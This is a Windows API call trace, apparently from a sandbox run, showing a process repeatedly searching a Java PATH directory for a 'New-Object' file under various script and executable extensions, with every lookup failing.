	[0046.476] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.476] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.476] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.psm1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.psm1", lpFilePart=0x0) returned 0x33
	[0046.476] GetFullPathNameW (in: lpFileName="New-Object.psm1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.psm1", lpFilePart=0x0) returned 0x29
	[0046.477] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.psm1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.477] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.477] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.480] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.481] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.psd1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.psd1", lpFilePart=0x0) returned 0x33
	[0046.481] GetFullPathNameW (in: lpFileName="New-Object.psd1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.psd1", lpFilePart=0x0) returned 0x29
	[0046.481] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.psd1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.481] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.481] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.481] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.481] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.481] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.481] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.COM", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.COM", lpFilePart=0x0) returned 0x32
	[0046.481] GetFullPathNameW (in: lpFileName="New-Object.COM", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.COM", lpFilePart=0x0) returned 0x28
	[0046.481] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.COM", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.482] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.482] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.482] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.482] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.EXE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.EXE", lpFilePart=0x0) returned 0x32
	[0046.482] GetFullPathNameW (in: lpFileName="New-Object.EXE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.EXE", lpFilePart=0x0) returned 0x28
	[0046.482] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.EXE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.482] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.482] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.483] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.483] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.BAT", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.BAT", lpFilePart=0x0) returned 0x32
	[0046.483] GetFullPathNameW (in: lpFileName="New-Object.BAT", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.BAT", lpFilePart=0x0) returned 0x28
	[0046.483] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.BAT", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.483] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.483] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.483] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.483] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.CMD", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.CMD", lpFilePart=0x0) returned 0x32
	[0046.484] GetFullPathNameW (in: lpFileName="New-Object.CMD", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.CMD", lpFilePart=0x0) returned 0x28
	[0046.484] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.CMD", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.484] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.484] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.505] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.505] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.VBS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.VBS", lpFilePart=0x0) returned 0x32
	[0046.506] GetFullPathNameW (in: lpFileName="New-Object.VBS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.VBS", lpFilePart=0x0) returned 0x28
	[0046.506] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.VBS", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.507] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.507] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.507] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.507] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.VBE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.VBE", lpFilePart=0x0) returned 0x32
	[0046.507] GetFullPathNameW (in: lpFileName="New-Object.VBE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.VBE", lpFilePart=0x0) returned 0x28
	[0046.507] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.VBE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.508] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.508] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.508] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.508] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.JS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.JS", lpFilePart=0x0) returned 0x31
	[0046.508] GetFullPathNameW (in: lpFileName="New-Object.JS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.JS", lpFilePart=0x0) returned 0x27
	[0046.508] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.JS", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.509] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.509] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.512] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.513] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.JSE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.JSE", lpFilePart=0x0) returned 0x32
	[0046.513] GetFullPathNameW (in: lpFileName="New-Object.JSE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.JSE", lpFilePart=0x0) returned 0x28
	[0046.513] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.JSE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.513] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.513] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.513] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.513] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.WSF", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.WSF", lpFilePart=0x0) returned 0x32
	[0046.514] GetFullPathNameW (in: lpFileName="New-Object.WSF", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.WSF", lpFilePart=0x0) returned 0x28
	[0046.514] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.WSF", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.514] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.514] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.514] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.514] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.WSH", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.WSH", lpFilePart=0x0) returned 0x32
	[0046.514] GetFullPathNameW (in: lpFileName="New-Object.WSH", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.WSH", lpFilePart=0x0) returned 0x28
	[0046.515] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.WSH", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
